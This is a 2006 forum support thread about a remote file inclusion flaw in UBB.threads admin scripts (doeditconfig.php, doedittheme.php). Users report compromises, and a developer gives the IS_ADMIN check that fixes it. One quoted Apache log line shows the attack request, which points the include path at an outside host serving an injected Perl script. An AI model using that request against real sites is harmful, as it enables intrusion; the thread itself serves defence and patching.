Previous Thread
Next Thread
Print Thread
Hop To
Joined: May 2006
Posts: 9
R
stranger
stranger
R Offline
Joined: May 2006
Posts: 9
There is a flaw in doedittheme.php and doeditconfig.php. The symptom is that the config.inc.php gets mostly truncated and the board is blank because it can't connect to the DB. The appropriate line in the apache log is:
158.39.35.18 - - [30/Sep/2006:00:29:13 -0700] "GET /ubb/admin/doeditconfig.php?thispath=../includes&config[path]=http://abok.us/cmd
.gif? HTTP/1.1" 200 171 "-" "libwww-perl/5.65"

and

It also takes place with doedittheme as well. This is being run from multiple locations. We had a different one from spain with as well. I'm running 6.5.1 with the other security hold fixed manually. I'll update to 6.5.5, but I didn't see anything to indicate that this is fixed in the update.

Joined: May 2006
Posts: 9
R
stranger
stranger
R Offline
Joined: May 2006
Posts: 9
The gif file injects a perl script. I have a copy of the script if you need it. I will be gone today, but I can do it tomorrow if you need.

Joined: Jun 2006
Posts: 9,242
Likes: 1
R
Former Developer
Former Developer
R Offline
Joined: Jun 2006
Posts: 9,242
Likes: 1
This was fixed in either 6.5.4 or 6.5.5. Basically each of these scripts needs this line at the top after the block of header comments. This keeps these scripts from being called directly.

if (!defined('IS_ADMIN')) exit;

You probably got hit from multiple locations because this was reposted on bugtraq yesterday. It's the same description of the exploit that was posted a few months back when we put out 6.5.4 and 6.5.5.

Joined: Jun 2006
Posts: 742
enthusiast
enthusiast
Joined: Jun 2006
Posts: 742
Ah - yeah, I've had 4 or 5 clients hit with this today, this explains why the hacks are coming out of the woodwork. Thanks for the fix. <img src="https://www.ubbcentral.com/boards/images/graemlins/wink.gif" alt="" />


Joshua Pettit
Web Developer
www.ThreadsDev.net | www.JoshuaPettit.com
Joined: Oct 2006
Posts: 2
B
stranger
stranger
B Offline
Joined: Oct 2006
Posts: 2
6.5.5?? The "Version notes" on the website only go up to 6.5.2, which is what we're running - have these not been updated? We've been hit with this same exploit.

Joined: Jun 2006
Posts: 9,242
Likes: 1
R
Former Developer
Former Developer
R Offline
Joined: Jun 2006
Posts: 9,242
Likes: 1
It looks like the version notes haven't been updated. We did send out an email to all of our customers trying to make sure that everyone got notified of the problem and that an upgrade was available.


Link Copied to Clipboard
ShoutChat
Comment Guidelines: Do post respectful and insightful comments. Don't flame, hate, spam.
Recent Topics
spam issues
by ECNet - 03/19/2024 11:45 PM
Looking for a forum
by azr - 03/15/2024 11:26 PM
Editing Links in Post
by Outdoorking - 03/15/2024 9:31 AM
Question on barkrowler and the like
by Mors - 02/29/2024 6:51 PM
Member Permissions Help
by domspeak - 02/27/2024 6:31 PM
Who's Online Now
0 members (), 396 guests, and 110 robots.
Key: Admin, Global Mod, Mod
Random Gallery Image
Latest Gallery Images
Los Angeles
Los Angeles
by isaac, August 6
3D Creations
3D Creations
by JAISP, December 30
Artistic structures
Artistic structures
by isaac, August 29
Stones
Stones
by isaac, August 19
Powered by UBB.threads™ PHP Forum Software 8.0.0
(Preview build 20230217)